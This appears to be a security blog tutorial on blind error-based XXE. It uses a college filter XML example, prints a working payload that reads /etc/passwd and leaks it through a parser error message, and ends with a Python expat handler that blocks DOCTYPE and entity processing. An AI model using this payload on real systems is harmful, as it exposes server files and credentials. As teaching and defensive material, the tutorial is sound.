Blind Error-Based XXE

What is Blind XXE?
When an application is vulnerable to XXE attacks but the server does not return any information in the HTTP response, it is called blind XXE. In blind XXE an attacker cannot retrieve the desired information directly, so it is harder to exploit. Still, an attacker can use some tricks to get the information via blind XXE. One way of exploiting it is out-of-band XXE, as explained in the previous blog.

What is Error Based XXE?
As explained earlier, blind XXE does not let an attacker get the information via the HTTP response; instead, an attacker can trigger an error so that the desired information is returned in the error message. This technique is called error-based XXE.

Example:
Let's understand error-based XXE with a basic example. Assume that a college application has a filter option and the following XML document is used as input to an insecure parser:

<?xml version="1.0" encoding="UTF-8"?>
<filter>
    <semester>3</semester>
    <branch>CE</branch>
</filter>

If the server parses this document insecurely on the server side, an attacker can supply the following payload to exploit error-based XXE:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE filter [
<!ENTITY % SecretFile SYSTEM "file:///etc/passwd">
<!ENTITY % semester "<!ENTITY &#x25; branch SYSTEM 'file:///invalid_path/%SecretFile;'>">
%semester;
]>
<filter>
    <semester>3</semester>
    <branch>&branch;</branch>
</filter>

In the payload above, the parameter entity semester is expanded inside the DTD, and its replacement text declares the general entity branch with the contents of SecretFile (the passwd file) embedded in its path. When branch is resolved, the parser tries to open "file:///invalid_path/contents_of_secret_file"; that file does not exist, and the resulting file-not-found error carries the file contents, as shown below:

java.io.FileNotFoundException: /invalid_path/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

How to prevent XXE?

A developer can use proper error and exception handling to prevent any error-based vulnerability.
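As an added example (not code from the original post, and in Python's standard library rather than the Java parser that produced the error above), here is a handler for the filter document that refuses any DOCTYPE before an entity can be declared, disables parameter and external entity processing, and returns a generic message to the client while the parser's detail goes only to the server log. The function names, the constructed sample documents and the log name are assumptions for this example.

```python
import logging
import xml.parsers.expat as expat

log = logging.getLogger("filter-parser")  # assumed logger name

# Constructed sample inputs: the legitimate filter document and an
# error-based XXE payload of the shape shown earlier in the post.
BENIGN_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<filter><semester>3</semester><branch>CE</branch></filter>"""
XXE_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE filter [
<!ENTITY % SecretFile SYSTEM "file:///etc/passwd">
<!ENTITY % semester "<!ENTITY &#x25; branch SYSTEM 'file:///invalid_path/%SecretFile;'>">
%semester;
]>
<filter><semester>3</semester><branch>&branch;</branch></filter>"""

class UnsafeXmlError(ValueError): "Document uses DTD features a filter request never needs."

def parse_filter(xml_bytes: bytes) -> dict:
    """Parse <filter> into {'semester': ..., 'branch': ...} with DTDs disabled."""
    p = expat.ParserCreate()
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Entities can only be declared inside a DOCTYPE, so refusing the
        # DOCTYPE stops the payload before any entity is defined or fetched.
        raise UnsafeXmlError("DOCTYPE declarations are not allowed")
    p.StartDoctypeDeclHandler = reject_doctype
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.ExternalEntityRefHandler = lambda *_: 0   # returning 0 makes expat abort
    result, text = {}, []
    p.StartElementHandler = lambda name, attrs: text.clear()
    p.CharacterDataHandler = text.append
    def end(name):
        if name in ("semester", "branch"):
            result[name] = "".join(text).strip()
    p.EndElementHandler = end
    p.Parse(xml_bytes, True)
    if set(result) != {"semester", "branch"}:
        raise ValueError("filter must contain semester and branch")
    return result

def handle_filter_request(xml_bytes: bytes) -> tuple:
    """Return (status, body); the parser's message is logged, never echoed."""
    try:
        f = parse_filter(xml_bytes)
        return 200, f"semester={f['semester']} branch={f['branch']}"
    except (expat.ExpatError, ValueError) as exc:
        log.warning("rejected filter document: %s", exc)  # server side only
        return 400, "Invalid filter document"
```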
